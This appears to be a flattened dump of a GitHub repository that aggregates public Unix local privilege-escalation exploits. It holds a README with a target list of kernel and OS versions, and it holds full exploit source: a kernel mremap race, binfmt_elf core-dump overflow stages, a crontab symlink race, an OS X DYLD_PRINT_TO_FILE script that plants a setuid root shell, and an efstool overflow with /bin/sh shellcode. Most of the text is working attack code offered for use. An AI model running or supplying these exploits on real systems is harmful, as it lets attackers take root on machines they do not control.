(tmp != (void *) (PAGEADDR - PAGE_SIZE)) { 223 | printf("\n[-] ERROR unmapping %d", i); fflush(stdout); 224 | fatal("unmap2"); 225 | } 226 | i--; 227 | if (!i) 228 | break; 229 | } 230 | } 231 | 232 | void catchme(int v) 233 | { 234 | blah++; 235 | } 236 | 237 | void exitme(int v) 238 | { 239 | _exit(0); 240 | } 241 | 242 | void childrip(int v) 243 | { 244 | waitpid(-1, 0, WNOHANG); 245 | } 246 | 247 | void slab_helper(void) 248 | { 249 | signal(SIGUSR1, &catchme); 250 | signal(SIGUSR2, &exitme); 251 | blah = 0; 252 | 253 | while (1) { 254 | while (!blah) pause(); 255 | 256 | blah = 0; 257 | if (!fork()) { 258 | dup2(0, DUPTO); 259 | kill(getppid(), SIGUSR1); 260 | while (1) pause(); 261 | } else { 262 | while (!blah) pause(); 263 | blah = 0; kill(ppid, SIGUSR2); 264 | } 265 | } 266 | exit(0); 267 | } 268 | 269 | int main(void) 270 | { 271 | int i, r, v, cnt; 272 | time_t start; 273 | 274 | srand(time(NULL) + getpid()); 275 | ppid = getpid(); 276 | uid = getuid(); 277 | gid = getgid(); 278 | 279 | hpid = fork(); 280 | if (!hpid) 281 | slab_helper(); 282 | 283 | fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE, 284 | MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); 285 | if (fops == MAP_FAILED) 286 | fatal("mmap fops VMA"); 287 | for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++) 288 | fops[i] = (unsigned)&kernel_code; 289 | for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++) 290 | fake_file[i] = (unsigned)fops; 291 | 292 | vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); 293 | if (vma_ro == MAP_FAILED) 294 | fatal("mmap1"); 295 | 296 | vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); 297 | if (vma_rw == MAP_FAILED) 298 | fatal("mmap2"); 299 | 300 | cnt = NUMVMA; 301 | while (1) { 302 | r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR); 303 | if (r == (-1)) { 304 | printf("\n[-] ERROR remapping"); fflush(stdout); 305 | fatal("remap1"); 306 | } 307 | cnt--; 308 | if (!cnt) break; 309 | 310 | r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR); 311 | if (r == (-1)) { 312 | printf("\n[-] ERROR remapping"); fflush(stdout); 313 | fatal("remap2"); 314 | } 315 | cnt--; 316 | if (!cnt) break; 317 | } 318 | 319 | victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE, 320 | MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); 321 | if (victim != (void *) PAGEADDR) 322 | fatal("mmap victim VMA"); 323 | 324 | v = *victim; 325 | *victim = v + 1; 326 | 327 | signal(SIGUSR1, &unprotect); 328 | signal(SIGUSR2, &catchme); 329 | signal(SIGCHLD, &childrip); 330 | printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout); 331 | start = time(NULL); 332 | 333 | cnt = NUMFORK; 334 | v = 0; 335 | while (1) { 336 | cnt--; 337 | v--; 338 | dummy += *victim; 339 | 340 | if (cnt > 1) { 341 | __asm__( 342 | "pusha \n" 343 | "movl %1, %%eax \n" 344 | "movl $("xstr(CLONEFL)"), %%ebx \n" 345 | "movl %%esp, %%ecx \n" 346 | "movl $120, %%eax \n" 347 | "int $0x80 \n" 348 | "movl %%eax, %0 \n" 349 | "popa \n" 350 | : : "m" (pid), "m" (dummy) 351 | ); 352 | } else { 353 | pid = fork(); 354 | } 355 | 356 | if (pid) { 357 | if (v <= 0 && cnt > 0) { 358 | float eta, tm; 359 | v = rand() % RNDINT / 2 + RNDINT / 2; 360 | tm = eta = (float)(time(NULL) - start); 361 | eta *= (float)NUMFORK; 362 | eta /= (float)(NUMFORK - cnt); 363 | printf("\r\t%u of %u [ %u %% ETA %6.1f s ] ", 364 | NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm); 365 | fflush(stdout); 366 | } 367 | if (cnt) { 368 | waitpid(pid, 0, 0); 369 | continue; 370 | } 371 | if (!cnt) { 372 | while (1) { 373 | r = wait(NULL); 374 | if (r == pid) { 375 | cleanup_vmas(); 376 | while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); } 377 | } 378 | } 379 | } 380 | } 381 | 382 | else { 383 | cleanup_vmas(); 384 | 385 | if (cnt > 0) { 386 | _exit(0); 387 | } 388 | 389 | printf("\n[+] overflow done, the moment of truth..."); fflush(stdout); 390 | sleep(1); 391 | 392 | signal(SIGUSR1, &catchme); 393 | munmap(0, PAGE_SIZE); 394 | dup2(0, 2); 395 | blah = 0; kill(ppid, SIGUSR1); 396 | while (!blah) pause(); 397 | 398 | munmap((void *)victim, PAGE_SIZE); 399 | dup2(0, DUPTO); 400 | 401 | blah = 0; kill(ppid, SIGUSR1); 402 | while (!blah) pause(); 403 | try_to_exploit(); 404 | while (1) pause(); 405 | } 406 | } 407 | return 0; 408 | } 409 | 410 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | UNIX-PrivEsc 2 | ============ 3 | 4 | This is just an effort to aggregate local UNIX privilege escalation exploits. They are all publicly available but don't allow for a sensible overview + it's always the quirky ones that you can't find when you need them. I am going to progressively push out exploits from a few sources which are listed below for reference. 5 | 6 | Import Complete: 7 | 8 | 0. http://exploit.linuxnote.org 9 | 0. http://www.0xdeadbeef.info/ (Partial, x86 Solaris + AIX) 10 | 11 | To Do List: 12 | 13 | 0. http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/ 14 | 0. http://www.0xdeadbeef.info/ (Raptor Kit) 15 | 0. OSX (Google-fu) 16 | 0. Exploit-DB (anything that's missing) 17 | 18 | WARNING 19 | ------- 20 | 21 | Be careful, the compiled exploits in the repo could contain ANYTHING, you may launch them and get root or "rm -rf /" or discover the formula for time travel! They have been added here for the odd sticky situation but I would never recommend running them if an alternative is available and certainly not without manual inspection! 22 | 23 | Target List 24 | ----------- 25 | 26 | ``` 27 | 2.2.27 ==> elfcd1.c, uselib24.zip, 28 | uselib24.c, mremap_pte.zip 29 | 2.2.x ==> ptrace24.zip, ptrace24.c 30 | 2.4.17 ==> newlocal.zip, kmod.zip, 31 | uselib24.zip, uselib24.c 32 | 2.4.18 ==> ptrace.zip, ptrace.c, 33 | ptrace-kmod.zip, brk.zip, brk2.zip 34 | 2.4.19 ==> ptrace.zip, ptrace.c, 35 | ptrace-kmod.zip, brk.zip, brk2.zip 36 | 2.4.20 ==> ptrace.zip, ptrace.c, 37 | ptrace-kmod.zip, brk.zip, 38 | brk2.zip, kmod.zip 39 | 2.4.21 ==> ptrace.zip, ptrace.c, 40 | ptrace-kmod.zip, brk.zip, brk2.zip 41 | 2.4.22-10 ==> loginx.zip 42 | 2.4.22 ==> ptrace.zip, ptrace.c, 43 | ptrace-kmod.zip, brk.zip, brk2.zip 44 | 2.4.23 ==> hatorihanzo.c, mremap_pte.zip 45 | 2.4.24 ==> mremap_pte.zip, uselib24.zip, 46 | uselib24.c, Linux_kernel_mremap.c 47 | 2.4.25 ==> mremap_pte.zip 48 | 2.4.26 ==> mremap_pte.zip, Linux_kernel_mremap.c 49 | 2.4.27 ==> mremap_pte.zip, uselib24.zip, uselib24.c 50 | 2.4.29 ==> expand_stack.c, uselib24.zip, uselib24.c 51 | 2.4.x ==> ptrace-kmod.zip, uselib24.zip, 52 | uselib24.c, newlocal.zip, 53 | kmod2.zip, elflbl.zip 54 | 2.4 2.6 ==> pwned.c 55 | 2.6.2 ==> h00lyshit.zip, h00lyshit.c, 56 | krad.zip, myptrace.zip 57 | 2.6.4 ==> hudo.c 58 | 2.6.5 ==> h00lyshit.zip, h00lyshit.c, 59 | krad.zip, hudo.c, 05.zip, krad.zip, 60 | krad2.zip, ong_bak.c 61 | 2.6.7 ==> h00lyshit.zip, h00lyshit.c, 62 | krad.zip, krad2.zip 63 | 2.6.8 ==> h00lyshit.zip, h00lyshit.c, 64 | krad.zip, krad2.zip 65 | 2.6.9-34 ==> h00lyshit.zip, h00lyshit.c, r00t.zip 66 | 2.6.9 ==> h00lyshit.zip, h00lyshit.c, 67 | krad.zip, krad2.zip, 05.zip, 06.zip, 04.zip 68 | 2.6.10 ==> h00lyshit.zip, h00lyshit.c, 69 | krad.zip, krad2.zip, 05.zip, 70 | uselib24.zip, uselib24.c 71 | 2.6.11 ==> k-rad.c, k-rad3.zip, krad2.zip, 72 | krad.zip, pwned.zip, pwned.c 73 | 2.6.12 ==> binfmt_elf.c, elfcd2.c 74 | 2.6.13 ==> h00lyshit.zip, h00lyshit.c, 75 | prct1.zip, prct2.zip, prct3.zip, 76 | prct4.zip, prct6.zip, raptor.zip 77 | 2.6.14 ==> h00lyshit.zip, h00lyshit.c, 78 | prct1.zip, prct2.zip, prct3.zip, 79 | prct4.zip, prct6.zip, raptor.zip 80 | 2.6.15 ==> h00lyshit.zip, h00lyshit.c, 81 | prct1.zip, prct2.zip, prct3.zip, 82 | prct4.zip, prct6.zip, raptor.zip 83 | 2.6.16 ==> h00lyshit.zip, h00lyshit.c, 84 | prct1.zip, prct2.zip, prct3.zip, 85 | prct4.zip, prct6.zip, raptor.zip 86 | 2.6.17 ==> prct1.zip, prct1.c, prct2.zip, 87 | prct2.c, prct3.zip, prct3.c, prct4.zip, 88 | prct4.c, prct6.zip, prct6.c, prct5.sh 89 | 2.6.18-164 ==> 2.6.18-164.zip 90 | 2.6.x ==> h00lyshit.zip, h00lyshit.c, 91 | cw7.3.zip, elflbl.zip, exp.sh, kmod2.zip, 92 | ptrace-kmod.zip, uselib24.zip, x.zip, x2.zip 93 | 2.6.17 - 2.6.24.1 ==> 2.6.17.c 94 | 2.6.23 - 2.6.24 ==> vmsplice.c 95 | 2.6.31.5 ==> enlightenment.tgz 96 | 2.6.31 ==> xpl-2.6.31-2010.zip 97 | 2.6.3-37 ==> 2.6.37.zip, full-nelson.c, half-nelson.c 98 | FreeBSD 4.4-4.6 ==> bsd.zip 99 | FreeBSD 4.8 ==> 48local.zip 100 | FreeBSD 5.3 ==> exploit.zip, exploit.c, freedbs5.3.zip 101 | FreeBSD 8.0 ==> w00t.sh 102 | RedHat 7.0 ==> crontab.c, epcs2.c 103 | RedHat 7.1 ==> rh71sm8.c 104 | RedHat 7.3 ==> afd-expl.zip, alsaplayer-suid.zip, 105 | nslconf.zip, ohMy-another-efs.zip 106 | RedHat 8.0 ==> 0x82-Remote.tannehehe.xpl.c, efs_local.zip, 107 | efs_local.c, ifenslave.zip, ifenslave.c 108 | Solaris(x86) 8-9 ==> raptor_ucbps.sh, raptor_peek.c 109 | Solaris(x86) 10 ==> raptor_peek.c, raptor_sysinfo.c, raptor_libnspr.sh 110 | raptor_libnspr2.sh, raptor_libnspr3.sh 111 | AIX 5.3 & 6.1 ==> raptor_libC.sh 112 | AIX 6.1 & 7.1 ==> tmb-vs-ibm-aix-libodm.c 113 | OSX <= 10.10.2 ==> rootpipe.py 114 | OSX 10.10 - 10.10.4 ==> dyld_print_to_file_root.sh 115 | ``` -------------------------------------------------------------------------------- /afd-expl.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/afd-expl.zip -------------------------------------------------------------------------------- /alsaplayer-suid.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/alsaplayer-suid.zip -------------------------------------------------------------------------------- /binfmt_elf.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux binfmt_elf core dump buffer overflow 3 | * 4 | * Copyright (c) 2005 iSEC Security Research. All Rights Reserved. 5 | * 6 | * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" 7 | * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION 8 | * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 9 | * 10 | */ 11 | // phase 1 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | 20 | #include 21 | 22 | 23 | static char *env[10], *argv[4]; 24 | static char page[PAGE_SIZE]; 25 | static char buf[PAGE_SIZE]; 26 | 27 | 28 | void fatal(const char *msg) 29 | { 30 | if(!errno) { 31 | fprintf(stderr, "\nFATAL: %s\n", msg); 32 | } 33 | else { 34 | printf("\n"); 35 | perror(msg); 36 | } 37 | fflush(stdout); fflush(stderr); 38 | _exit(129); 39 | } 40 | 41 | 42 | int main(int ac, char **av) 43 | { 44 | int esp, i, r; 45 | struct rlimit rl; 46 | 47 | __asm__("movl %%esp, %0" : : "m"(esp)); 48 | printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], 49 | av[ac-1]+strlen(av[ac-1]), esp); 50 | rl.rlim_cur = RLIM_INFINITY; 51 | rl.rlim_max = RLIM_INFINITY; 52 | r = setrlimit(RLIMIT_CORE, &rl); 53 | if(r) fatal("setrlimit"); 54 | 55 | memset(env, 0, sizeof(env) ); 56 | memset(argv, 0, sizeof(argv) ); 57 | memset(page, 'A', sizeof(page) ); 58 | page[PAGE_SIZE-1]=0; 59 | 60 | // move up env & exec phase 2 61 | if(!strcmp(av[0], "AAAA")) { 62 | printf("\n[+] phase 2, to crash "); fflush(stdout); 63 | argv[0] = "elfcd2"; 64 | argv[1] = page; 65 | 66 | // term 0 counts! 67 | memset(buf, 0, sizeof(buf) ); 68 | for(i=0; i<789 + 4; i++) 69 | buf[i] = 'C'; 70 | argv[2] = buf; 71 | execve(argv[0], argv, env); 72 | _exit(127); 73 | } 74 | 75 | // move down env & reexec 76 | for(i=0; i<9; i++) 77 | env[i] = page; 78 | 79 | argv[0] = "AAAA"; 80 | printf("\n[+] phase 1"); fflush(stdout); 81 | execve(av[0], argv, env); 82 | 83 | return 0; 84 | } -------------------------------------------------------------------------------- /brk.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/brk.zip -------------------------------------------------------------------------------- /brk2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/brk2.zip -------------------------------------------------------------------------------- /bsd.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/bsd.zip -------------------------------------------------------------------------------- /crontab.c: -------------------------------------------------------------------------------- 1 | /******************************************************************* 2 | Crontab tmp file race condition 3 | 4 | http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771 5 | 6 | Apparently this is fixed. Wonder why it still works. 7 | 8 | Local exploit 9 | 10 | Quick and dirty exploit for crontab insecure tmp files 11 | Redhat 7.0 - kept up2date with up2date 12 | Checked Tue Jun 26 00:15:32 NZST 2001 13 | -rw------- 1 root root 4096 Jun 26 00:15 evil 14 | 15 | Requires root to execute crontab -e while the program is 16 | running. 17 | 18 | Not really likely to be too big of a problem, I hope. 19 | 20 | Could possibly be useful with the (still unpatched) 21 | makewhatis.cron bug. 22 | -- zen-parse 23 | 24 | /******************************************************************* 25 | #define SAFER [1000] 26 | /*******************************************************************/ 27 | int 28 | shake (int script kiddy) 29 | { 30 | int f; 31 | char r SAFER; 32 | int w; 33 | 34 | f = fopen ("/proc/loadavg", "r"); 35 | fscanf (f, "%*s %*s %*s %*s %s", r); 36 | fclose (f); 37 | w = atoi (r); 38 | return w; 39 | } 40 | 41 | main (int argc, char *argv[]) 42 | { 43 | int p; 44 | char v SAFER; 45 | sprintf (v, "/tmp/.crontab.%d.swp", shake ()); 46 | symlink ("/evil", v); 47 | while (access ("/evil", 0)) 48 | { 49 | for (p = -30; p < 0; p++) 50 | { 51 | sprintf (v, "/tmp/.crontab.%d.swp", shake () - p); 52 | symlink ("/evil", v); 53 | } 54 | sprintf (v, "/tmp/.crontab.%d.swp", shake () - p); 55 | unlink (v); 56 | } 57 | for (p = -100; p < 0; p++) 58 | { 59 | sprintf (v, "/tmp/.crontab.%d.swp", shake () - p); 60 | unlink (v); 61 | } 62 | } 63 | 64 | /***************************************************************** 65 | ** *** * ** ********* *********************** 66 | ** * * ** ****** ******* ** ********************** 67 | ** * ** ** ******** ******* *** ******** 68 | ** * * * ******* ******* ****** * * * * ******* 69 | ** *** * *********** ** ** ** * * * * * ******* 70 | ** *** * ****** *** *** *** ** **** ******* 71 | *****************************************************************/ 72 | // 73 | // xxxx xxx xxx x x 74 | // xx x x x x x 75 | // xx x x xxx x x 76 | // xx x x x x x 77 | // xxxx xxx xxx x 78 | // http://mp3.com/cosv 79 | 80 | -------------------------------------------------------------------------------- /cw7.3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/cw7.3.zip -------------------------------------------------------------------------------- /dyld_print_to_file_root.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # Simple Proof of Concept Exploit for the DYLD_PRINT_TO_FILE 4 | # local privilege escalation vulnerability in OS X 10.10 - 10.10.4 5 | # 6 | # (C) Copyright 2015 Stefan Esser 7 | # 8 | # Wait months for a fix from Apple or install the following KEXT as protection 9 | # https://github.com/sektioneins/SUIDGuard 10 | # 11 | # Use at your own risk. This copies files around with root permissions, 12 | # overwrites them and deletes them afterwards. Any glitch could corrupt your 13 | # system. So you have been warned. 14 | 15 | SUIDVICTIM=/usr/bin/newgrp 16 | 17 | # why even try to prevent a race condition? 18 | TARGET=`pwd`/tmpXXXXX 19 | 20 | rm -rf $TARGET 21 | mkdir $TARGET 22 | 23 | cat << EOF > $TARGET/boomsh.c 24 | #include 25 | #include 26 | #include 27 | 28 | int main() 29 | { 30 | setuid(0); 31 | setgid(0); 32 | system("/bin/bash -i"); 33 | printf("done.\n"); 34 | return 0; 35 | } 36 | EOF 37 | cat << EOF > $TARGET/overwrite.c 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | 44 | int main(int argc, char **argv) 45 | { 46 | int fd; 47 | char buffer[1024]; 48 | ssize_t toread, numread; 49 | ssize_t numwritten; 50 | ssize_t size; 51 | 52 | /* disable O_APPEND */ 53 | fcntl(3, F_SETFL, 0); 54 | lseek(3, 0, SEEK_SET); 55 | 56 | /* write file into it */ 57 | fd = open( 58 | EOF 59 | echo "\"$TARGET/boomsh\"" >> $TARGET/overwrite.c 60 | cat << EOF >> $TARGET/overwrite.c 61 | , O_RDONLY, 0); 62 | if (fd > 0) { 63 | 64 | /* determine size */ 65 | size = lseek(fd, 0, SEEK_END); 66 | lseek(fd, 0, SEEK_SET); 67 | 68 | while (size > 0) { 69 | if (size > sizeof(buffer)) { 70 | toread = sizeof(buffer); 71 | } else { 72 | toread = size; 73 | } 74 | 75 | numread = read(fd, &buffer, toread); 76 | if (numread < toread) { 77 | fprintf(stderr, "problem reading\n"); 78 | _exit(2); 79 | } 80 | numwritten = write(3, &buffer, numread); 81 | if (numread != numwritten) { 82 | fprintf(stderr, "problem writing\n"); 83 | _exit(2); 84 | } 85 | 86 | size -= numwritten; 87 | 88 | } 89 | 90 | fsync(3); 91 | close(fd); 92 | } else { 93 | fprintf(stderr, "Cannot open for reading\n"); 94 | } 95 | 96 | return 0; 97 | } 98 | EOF 99 | 100 | cp $SUIDVICTIM $TARGET/backup 101 | gcc -o $TARGET/overwrite $TARGET/overwrite.c 102 | gcc -o $TARGET/boomsh $TARGET/boomsh.c 103 | 104 | EDITOR=$TARGET/overwrite DYLD_PRINT_TO_FILE=$SUIDVICTIM crontab -e 2> /dev/null 105 | echo "cp $TARGET/boomsh /usr/bin/boomsh; chmod 04755 /usr/bin/boomsh " | $SUIDVICTIM > /dev/null 2> /dev/null 106 | echo "cp $TARGET/backup $SUIDVICTIM" | /usr/bin/boomsh > /dev/null 2> /dev/null 107 | 108 | rm -rf $TARGET 109 | 110 | /usr/bin/boomsh -------------------------------------------------------------------------------- /efs_local.c: -------------------------------------------------------------------------------- 1 | /* efs_local.c - efstool local stack-based exploit 2 | * 3 | * Simple buffer overflow bug in efstool under linux, will 4 | * spawn a user shell and a root shell if efstool binary 5 | * is setuid (chmod 4755) and owned by root. 6 | * 7 | * - Gentoo Linux 1.4-rc1 (tested and works) 8 | * - RedHat Linux 8.0 (tested and works) 9 | * - RedHat Linux 7.3 (not tested) 10 | * - RedHat Linux 7.2 (not tested) 11 | * - Slackware Linux 8.1 (tested and works) 12 | * - Slackware Linux 8.0 (tested and works, but change path) 13 | * 14 | * The list is getting long, think most of the major linux 15 | * and/or *BSD's are affected. If you want to try out this 16 | * on *BSD you have to replace the shellcode. 17 | * 18 | * 19 | * Created: 2002-12-29 by N.Kursu (kursu at linux dot se) 20 | * Release: v0.8 21 | * 22 | * * Use this on your own risk and dont blame me if * 23 | * * your life gets messed up! * 24 | * 25 | * Greetings to kozmic, for giveing me a shell on his "hack me" 26 | * RedHat Linux 8.0 box and testing out Gentoo 1.4rc1. 27 | */ 28 | 29 | 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | #define NOP 0x90 36 | #define BSIZE 3000 37 | #define ERROR -1 38 | #define PPATH "/usr/bin/efstool" 39 | 40 | char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76" 41 | "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3" 42 | "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40" 43 | "\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; 44 | 45 | unsigned long get_esp(void) { 46 | __asm__("movl %esp, %eax"); 47 | } 48 | 49 | void usage(char *cmd) { 50 | fprintf(stderr, "\n* Efstool local (user/root) exploit by kursu *\n"); 51 | fprintf(stderr, "==============================================\n"); 52 | fprintf(stderr, "An offset around 2000 should work, it did for\n"); 53 | fprintf(stderr, "me under Slackware Linux 8.1.\n"); 54 | fprintf(stderr, "\n\nUsage: %s \n\n", cmd); 55 | exit(ERROR); 56 | } 57 | 58 | int main(int argc, char *argv[]) { 59 | int i, off, nop = NOP; 60 | long esp, ret, *ret_ptr; 61 | char *buffer, *buffer_ptr; 62 | 63 | if(argc<2) { usage(argv[0]); } 64 | 65 | off = atoi(argv[1]); 66 | esp = get_esp(); 67 | ret = esp-off; 68 | 69 | if(!(buffer = (char *)malloc(BSIZE))) { 70 | fprintf(stderr, "\nCant allocate memory!\n"); 71 | exit(ERROR); 72 | } 73 | 74 | buffer_ptr = buffer; 75 | ret_ptr = (long *)buffer_ptr; 76 | 77 | for(i = 0; i < BSIZE; i+=4) { 78 | *(ret_ptr++) = ret; 79 | } 80 | 81 | for(i = 0; i < BSIZE/2; i++) { 82 | buffer[i] = nop; 83 | } 84 | 85 | buffer_ptr = buffer + ((BSIZE/2) - (strlen(shellcode)/2)); 86 | 87 | for(i = 0; i < strlen(shellcode); i++) { 88 | *(buffer_ptr++) = shellcode[i]; 89 | } 90 | 91 | 92 | buffer[BSIZE-1] = '\0'; 93 | execl(PPATH, "efstool", buffer, 0); 94 | 95 | return 0; 96 | 97 | } 98 | -------------------------------------------------------------------------------- /efs_local.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/efs_local.zip -------------------------------------------------------------------------------- /elfcd1.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux binfmt_elf core dump buffer overflow 3 | * 4 | * Copyright (c) 2005 iSEC Security Research. All Rights Reserved. 5 | * 6 | * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" 7 | * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION 8 | * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 9 | * 10 | */ 11 | // phase 1 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | 20 | #include 21 | 22 | 23 | static char *env[10], *argv[4]; 24 | static char page[PAGE_SIZE]; 25 | static char buf[PAGE_SIZE]; 26 | 27 | 28 | void fatal(const char *msg) 29 | { 30 | if(!errno) { 31 | fprintf(stderr, "\nFATAL: %s\n", msg); 32 | } 33 | else { 34 | printf("\n"); 35 | perror(msg); 36 | } 37 | fflush(stdout); fflush(stderr); 38 | _exit(129); 39 | } 40 | 41 | 42 | int main(int ac, char **av) 43 | { 44 | int esp, i, r; 45 | struct rlimit rl; 46 | 47 | __asm__("movl %%esp, %0" : : "m"(esp)); 48 | printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], 49 | av[ac-1]+strlen(av[ac-1]), esp); 50 | rl.rlim_cur = RLIM_INFINITY; 51 | rl.rlim_max = RLIM_INFINITY; 52 | r = setrlimit(RLIMIT_CORE, &rl); 53 | if(r) fatal("setrlimit"); 54 | 55 | memset(env, 0, sizeof(env) ); 56 | memset(argv, 0, sizeof(argv) ); 57 | memset(page, 'A', sizeof(page) ); 58 | page[PAGE_SIZE-1]=0; 59 | 60 | // move up env & exec phase 2 61 | if(!strcmp(av[0], "AAAA")) { 62 | printf("\n[+] phase 2, to crash "); fflush(stdout); 63 | argv[0] = "elfcd2"; 64 | argv[1] = page; 65 | 66 | // term 0 counts! 67 | memset(buf, 0, sizeof(buf) ); 68 | for(i=0; i<789 + 4; i++) 69 | buf[i] = 'C'; 70 | argv[2] = buf; 71 | execve(argv[0], argv, env); 72 | _exit(127); 73 | } 74 | 75 | // move down env & reexec 76 | for(i=0; i<9; i++) 77 | env[i] = page; 78 | 79 | argv[0] = "AAAA"; 80 | printf("\n[+] phase 1"); fflush(stdout); 81 | execve(av[0], argv, env); 82 | 83 | return 0; 84 | } 85 | __EOF__ 86 | cat <<__EOF__>elfcd2.c 87 | // phase 2 88 | #include 89 | #include 90 | #include 91 | #include 92 | 93 | #include 94 | 95 | #include 96 | 97 | #define __NR_sys_read __NR_read 98 | #define __NR_sys_kill __NR_kill 99 | #define __NR_sys_getpid __NR_getpid 100 | 101 | 102 | char stack[4096 * 6]; 103 | static int errno; 104 | 105 | 106 | inline _syscall3(int, sys_read, int, a, void*, b, int, l); 107 | inline _syscall2(int, sys_kill, int, c, int, a); 108 | inline _syscall0(int, sys_getpid); 109 | 110 | 111 | // yeah, lets do it 112 | void killme() 113 | { 114 | char c='a'; 115 | int pid; 116 | 117 | pid = sys_getpid(); 118 | for(;;) { 119 | sys_read(0, &c, 1); 120 | sys_kill(pid, 11); 121 | } 122 | } 123 | 124 | 125 | // safe stack stub 126 | __asm__( 127 | " nop \n" 128 | "_start: movl \$0xbfff6ffc, %esp \n" 129 | " jmp killme \n" 130 | ".global _start \n" 131 | ); 132 | __EOF__ 133 | cat <<__EOF__>elfcd.ld 134 | OUTPUT_FORMAT("elf32-i386", "elf32-i386", 135 | "elf32-i386") 136 | OUTPUT_ARCH(i386) 137 | ENTRY(_start) 138 | SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib); 139 | SEARCH_DIR(/usr/i486-suse-linux/lib); 140 | 141 | MEMORY 142 | { 143 | ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000 144 | rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000 145 | } 146 | 147 | PHDRS 148 | { 149 | headers PT_PHDR PHDRS ; 150 | text PT_LOAD FILEHDR PHDRS ; 151 | fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ; 152 | } 153 | 154 | SECTIONS 155 | { 156 | 157 | .dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; } >rom :fuckme 158 | 159 | . = 0xbfff0000 + SIZEOF_HEADERS; 160 | .text : { *(.text) } >ram :text 161 | .data : { *(.data) } >ram :text 162 | .bss : 163 | { 164 | *(.dynbss) 165 | *(.bss) 166 | *(.bss.*) 167 | *(.gnu.linkonce.b.*) 168 | *(COMMON) 169 | . = ALIGN(32 / 8); 170 | } >ram :text 171 | 172 | } -------------------------------------------------------------------------------- /elfcd2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #include 9 | 10 | #define __NR_sys_read __NR_read 11 | #define __NR_sys_kill __NR_kill 12 | #define __NR_sys_getpid __NR_getpid 13 | 14 | 15 | char stack[4096 * 6]; 16 | static int errno; 17 | 18 | 19 | inline _syscall3(int, sys_read, int, a, void*, b, int, l); 20 | inline _syscall2(int, sys_kill, int, c, int, a); 21 | inline _syscall0(int, sys_getpid); 22 | 23 | 24 | // yeah, lets do it 25 | void killme() 26 | { 27 | char c='a'; 28 | int pid; 29 | 30 | pid = sys_getpid(); 31 | for(;;) { 32 | sys_read(0, &c, 1); 33 | sys_kill(pid, 11); 34 | } 35 | } 36 | 37 | 38 | // safe stack stub 39 | __asm__( 40 | " nop \n" 41 | "_start: movl \$0xbfff6ffc, %esp \n" 42 | " jmp killme \n" 43 | ".global _start \n" 44 | ); 45 | __EOF__ 46 | cat <<__EOF__>elfcd.ld 47 | 